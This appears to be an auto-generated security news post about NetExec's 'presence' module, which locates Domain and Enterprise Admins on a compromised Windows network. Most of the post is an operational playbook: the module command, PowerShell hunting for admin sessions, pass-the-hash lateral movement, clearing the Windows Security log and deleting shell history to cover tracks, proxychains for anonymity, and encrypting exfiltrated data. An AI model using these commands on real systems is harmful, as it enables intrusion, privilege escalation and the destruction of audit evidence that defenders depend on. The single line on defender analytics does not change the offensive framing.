Listen to this Post
NetExec’s latest “presence” module helps identify Domain/Enterprise Admins post-compromise by scanning:
– `C:\Users\` directory
– Running processes
– Scheduled tasks
Using native Windows protocols, it evades detection better than custom tools.
You Should Know:
1. Install/Update NetExec
git clone https://github.com/Pennyw0rth/NetExec cd NetExec pip install .
2. Run the “Presence” Module
nxc smb <TARGET_IP> -u <USER> -p <PASSWORD> -M presence
3. Manual Checks (If NetExec Isn’t Available)
- Check Users Folder:
Get-ChildItem C:\Users | Select-Object Name
- List Running Processes:
Get-Process -IncludeUserName | Where-Object { $_.UserName -like "DOMAINADMIN" } - Scheduled Tasks:
Get-ScheduledTask | Where-Object { $_.Principal.UserId -like "DOMAINADMIN" }
4. Lateral Movement with NetExec
nxc smb <TARGET_IP> -u <DOMAIN_ADMIN_USER> -H <NTLM_HASH> --local-auth -x "whoami"
5. Covering Tracks (Linux/Win)
- Clear Logs (Windows):
wevtutil cl Security
- Delete Command History (Linux):
history -c && rm ~/.bash_history
What Undercode Say
NetExec’s “presence” module simplifies post-exploitation reconnaissance, but manual checks ensure redundancy. Always:
– Use proxychains for anonymity:
proxychains nxc smb <TARGET> -u <USER> -p <PASS>
– Encrypt exfiltrated data:
tar czf - /data | openssl enc -aes-256-cbc -out data.tar.gz.enc
– Check for SIEM alerts post-operation:
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688}
Prediction
Increased adoption of native protocol abuse (like SMB/WMI) will challenge traditional EDR solutions, pushing defenders toward behavioral analytics.
Expected Output:
[+] Domain Admins found in C:\Users: - DA_Admin1 - DA_Admin2 [+] Processes running as Domain Admins: - explorer.exe (DA_Admin1) [+] Scheduled Tasks: - BackupTask (User: DOMAIN\EnterpriseAdmin)
Relevant URL: NetExec GitHub
IT/Security Reporter URL:
Reported By: Alexander Neff – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
